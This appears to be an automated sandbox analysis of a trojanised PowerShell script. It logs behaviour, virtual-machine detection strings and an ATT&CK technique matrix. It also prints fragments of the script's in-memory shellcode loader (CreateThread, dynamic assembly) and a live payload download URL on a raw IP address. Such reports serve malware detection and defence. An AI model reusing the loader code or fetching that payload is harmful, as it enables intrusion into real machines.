Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer($VAAddr, $VADeleg)$CTAddr = GPA kernel32.dll CreateThread$CTDeleg = GDT @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])$CT = $marshal::GetDelegat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly($DA, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) $MB = $AB.DefineDynamicModule('IMM', $false) $TB = $MB.DefineType('MDT', 'Class, Public, Sealed, AnsiClass, AutoCl
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7643A5 push edi; iretd 0_2_00007FFD9B7643A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B760952 push E95B72D0h; ret 0_2_00007FFD9B7609C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7600BD pushad ; iretd 0_2_00007FFD9B7600C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4592Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5278Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep time: -12912720851596678s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: Amcache.hve.7.drBinary or memory string: VMware
Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.drBinary or memory string: vmci.sys
Source: Amcache.hve.7.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.drBinary or memory string: VMware20,1
Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: powershell.exe, 00000000.00000002.2158398672.0000019940402000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_@
Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
Source: powershell.exe, 00000000.00000002.2186782960.000001995A7DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ
Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
Process Injection
1
Masquerading
OS Credential Dumping11
Security Software Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
21
Virtualization/Sandbox Evasion
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager21
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture11
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Software Packing
LSA Secrets2
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials11
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
1ZhE3yY8rV.ps132%ReversingLabsWin32.Trojan.Boxter
1ZhE3yY8rV.ps1100%AviraTR/PSploit.G1
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://upx.sf.net0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
No contacted domains info
NameMaliciousAntivirus DetectionReputation
http://217.195.153.196/assets/paleochorologyma.exefalse
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://217.195.153.196/assets/paleopowershell.exe, 00000000.00000002.2159022873.0000019943D23000.00000004.00000800.00020000.00000000.sdmpfalse
      unknown
      http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2177577460.0000019952677000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2177577460.0000019952535000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2159022873.00000199426F2000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2159022873.00000199426F2000.00000004.00000800.00020000.00000000.sdmpfalse
        unknown
        https://go.micropowershell.exe, 00000000.00000002.2159022873.0000019943322000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://contoso.com/powershell.exe, 00000000.00000002.2177577460.0000019952535000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2177577460.0000019952677000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2177577460.0000019952535000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://contoso.com/Licensepowershell.exe, 00000000.00000002.2177577460.0000019952535000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://contoso.com/Iconpowershell.exe, 00000000.00000002.2177577460.0000019952535000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://upx.sf.netAmcache.hve.7.drfalse
